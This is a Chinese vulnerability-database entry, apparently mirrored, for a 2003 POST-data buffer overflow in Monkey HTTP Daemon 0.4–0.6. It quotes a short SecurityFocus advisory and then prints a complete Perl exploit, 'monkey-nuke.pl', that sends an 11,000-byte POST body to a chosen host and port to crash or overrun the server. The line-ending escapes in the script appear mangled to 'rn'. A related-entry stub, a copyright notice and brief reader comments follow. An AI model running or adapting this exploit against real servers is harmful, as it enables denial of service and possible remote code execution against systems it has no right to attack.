Monkey HTTP Daemon 0.4/0.5/0.6 – Excessive POST Data Buffer Overflow
漏洞ID | 1053782 | 漏洞类型 | |
发布时间 | 2003-03-24 | 更新时间 | 2003-03-24 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7202/info
Monkey HTTP Daemon is prone to a boundary condition error. This condition occurs when the server attempts to handle excessive HTTP POST data. Exploitation could allow a remote attacker to corrupt sensitive regions of memory with attacker-supplied values, resulting in code execution. Exploitation attempts may also result in a denial of service.
#!/usr/bin/perl
# monkey-nuke.pl
# Monkey HTTPd Remote Buffer Overflow
# Discovery/Exploit by Matthew Murphy
use IO::Socket;
print STDOUT "What host to connect to []: ";
$host = trim(chomp($line = <STDIN>));
print STDOUT "What port to connect to [80]: ";
$port = trim(chomp($line = <STDIN>));
$addr = "$host:$port";
print STDOUT "What script to submit to [/cgi-bin/test.pl]: ";
$script = trim(chomp($line = <STDIN>));
$buffer = "A"x11000;
$exploit = "POST /$script HTTP/1.0rn";
$exploit.= "Content-Type: application/x-www-form-urlencodedrn";
$exploit.= "Content-Length: 11000rnrn";
$exploit.= "$bufferrnrn";
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr);
print $f $exploit;
sleep 5;
undef $f;
相关推荐: XOOPS Quizz模块跨站脚本(XSS)漏洞
XOOPS Quizz模块跨站脚本(XSS)漏洞 漏洞ID 1203343 漏洞类型 跨站脚本 发布时间 2002-12-31 更新时间 2002-12-31 CVE编号 CVE-2002-2386 CNNVD-ID CNNVD-200212-466 漏洞平台…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666